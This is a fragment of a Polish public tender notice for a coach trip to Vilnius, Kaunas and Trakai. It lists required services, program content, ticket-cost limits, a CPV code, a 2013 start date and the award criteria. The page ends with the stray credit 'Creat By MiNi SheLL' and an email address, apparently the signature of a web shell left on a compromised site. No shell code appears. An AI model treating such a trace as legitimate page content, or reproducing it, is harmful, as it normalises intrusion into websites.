Świadczenia dodatkowe: opłaty: drogowe, parkingowe, autostradowe, ewentualne taksy klimatyczne, obsługa pilota na trasie (1 pilot na 1 autokar), obsługa lokalnego (polskojęzycznego) przewodnika w Wilnie, Kownie i Trokach (min. 8 godzin - 1 przewodnik/ autokar).
Program: 
Wykonawca opisze program autorski wycieczki, który powinien zawierać opis poszczególnych punktów programu, kolejność zwiedzania - ze wskazaniem czy z udziałem lokalnego przewodnika (ilość godzin/ minut), opis w zakresie wyżywienia (proponowane menu), z uwzględnieniem imprezy integracyjnej przy muzyce mechanicznej. 
Bilety wstępu do zwiedzanych obiektów płatne osobno przez uczestników wycieczki. 
W ofercie Wykonawca poda orientacyjny koszt za wstępy. Kwota nie powinna przekroczyć 100 LT oraz 80 zł/osobę..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 63.51.10.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.05.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. atrakcyjność programu wycieczki - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com